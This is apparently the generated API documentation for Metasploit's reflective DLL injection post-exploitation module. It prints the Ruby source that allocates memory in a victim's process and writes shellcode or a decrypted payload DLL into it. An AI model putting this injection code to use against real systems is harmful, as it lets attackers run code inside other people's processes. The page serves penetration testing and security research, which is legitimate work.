Module: Msf::Post::Windows::ReflectiveDLLInjection

Includes:
ReflectiveDLLLoader
Included in:
Process
Defined in:
lib/msf/core/post/windows/reflective_dll_injection.rb

Overview

This module exposes functionality which makes it easier to do Reflective DLL Injection into processes on a victim’s machine.

Constant Summary collapse

PAGE_ALIGN =
1024

Constants included from ReflectiveDLLLoader

ReflectiveDLLLoader::EXPORT_REFLECTIVELOADER

Instance Method Summary collapse

Methods included from ReflectiveDLLLoader

#load_rdi_dll, #load_rdi_dll_from_data

Instance Method Details

#initialize(info = {}) ⇒ Object



16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
# File 'lib/msf/core/post/windows/reflective_dll_injection.rb', line 16

def initialize(info = {})
  super(
    update_info(
      info,
      'Compat' => {
        'Meterpreter' => {
          'Commands' => %w[
            stdapi_sys_process_memory_allocate
            stdapi_sys_process_memory_protect
            stdapi_sys_process_memory_write
          ]
        }
      }
    )
  )
end

#inject_dll_data_into_process(process, dll_data, loader_name: 'ReflectiveLoader', loader_ordinal: EXPORT_REFLECTIVELOADER) ⇒ Array

Inject a reflectively-injectable DLL into the given process using reflective injection.

Parameters:

Returns:

  • (Array)

    Tuple of allocated memory address and offset to the ReflectiveLoader function.



80
81
82
83
84
85
86
# File 'lib/msf/core/post/windows/reflective_dll_injection.rb', line 80

def inject_dll_data_into_process(process, dll_data, loader_name: 'ReflectiveLoader', loader_ordinal: EXPORT_REFLECTIVELOADER)
  decrypted_dll_data = ::MetasploitPayloads::Crypto.decrypt(ciphertext: dll_data)
  offset = load_rdi_dll_from_data(decrypted_dll_data, loader_name: loader_name, loader_ordinal: loader_ordinal)
  dll_mem = inject_into_process(process, decrypted_dll_data)

  return dll_mem, offset
end

#inject_dll_into_process(process, dll_path, loader_name: 'ReflectiveLoader', loader_ordinal: EXPORT_REFLECTIVELOADER) ⇒ Array

Inject a reflectively-injectable DLL into the given process using reflective injection.

Parameters:

Returns:

  • (Array)

    Tuple of allocated memory address and offset to the ReflectiveLoader function.



64
65
66
67
68
69
# File 'lib/msf/core/post/windows/reflective_dll_injection.rb', line 64

def inject_dll_into_process(process, dll_path, loader_name: 'ReflectiveLoader', loader_ordinal: EXPORT_REFLECTIVELOADER)
  dll, offset = load_rdi_dll(dll_path, loader_name: loader_name, loader_ordinal: loader_ordinal)
  dll_mem = inject_into_process(process, dll)

  return dll_mem, offset
end

#inject_into_process(process, shellcode) ⇒ Integer

Inject the given shellcode into a target process.

Parameters:

Returns:

  • (Integer)

    Address of the shellcode in the target process's memory.



41
42
43
44
45
46
47
48
49
50
51
52
53
# File 'lib/msf/core/post/windows/reflective_dll_injection.rb', line 41

def inject_into_process(process, shellcode)
  shellcode_size = shellcode.length

  unless shellcode.length % PAGE_ALIGN == 0
    shellcode_size += PAGE_ALIGN - (shellcode.length % PAGE_ALIGN)
  end

  shellcode_mem = process.memory.allocate(shellcode_size)
  process.memory.protect(shellcode_mem)
  process.memory.write(shellcode_mem, shellcode)

  return shellcode_mem
end